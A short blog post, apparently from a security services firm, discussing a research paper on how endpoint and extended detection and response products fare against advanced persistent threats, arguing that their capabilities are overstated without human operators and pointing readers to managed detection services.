An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors

scan, computer, data-3924343.jpg

An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors.

Recently I wrote about EDR failure to detect and respond to cases of Advanced Persistent Threats here after discovering a research paper on the topic when researching the use of Machine Learning in cyber security Detection and response solutions such as Endpoint Detection and Response (EDR) or eXtended detection and response (XDR) solutions.

The story is that these types of solutions will provide your organisation with a level of protection that you previously could only have if you were to pay a substantial amount of money and employ your own Security Operations analysts to do the event correlation and threat hunting activities.

The Truth is far more nuanced, and in a way that far over estimates the capability of any EDR or XDR solution to protect your organisation, the range of capabilities and functionality in tools that are referred to as a detection and response solution is vast. The machine learning techniques within these solutions are also vastly different and may also be applied to different parts of the software, for example having Machine learning algorithms for telemetry and event correlation is not providing any value in the Threat hunting process, these elements are often not clear when evaluating EDR or XDR solutions.

Before making a decision on and EDR or XDR solution, ask yourself whether you will be able to manage the products, they do add value to your cyber resilience but not always in the areas you would expect and without human operators they are of very limited value at all over and above a Next generation Virus product.

Alternatively look for a provider of a Managed detection and response service or a managed Security operations centre where you pay another organisation to fully manage the detection and response service as many of the EDR/XDR solutions do collect the data to indicate a breach, this is often referred to as a “Telemetry detection” in tests.

https://www.mdpi.com/2624-800X/1/3/21/htm

As always please feel free to reach out to us if you require assistance with Ear or XDR solutions here.

Leave a Reply

Your email address will not be published.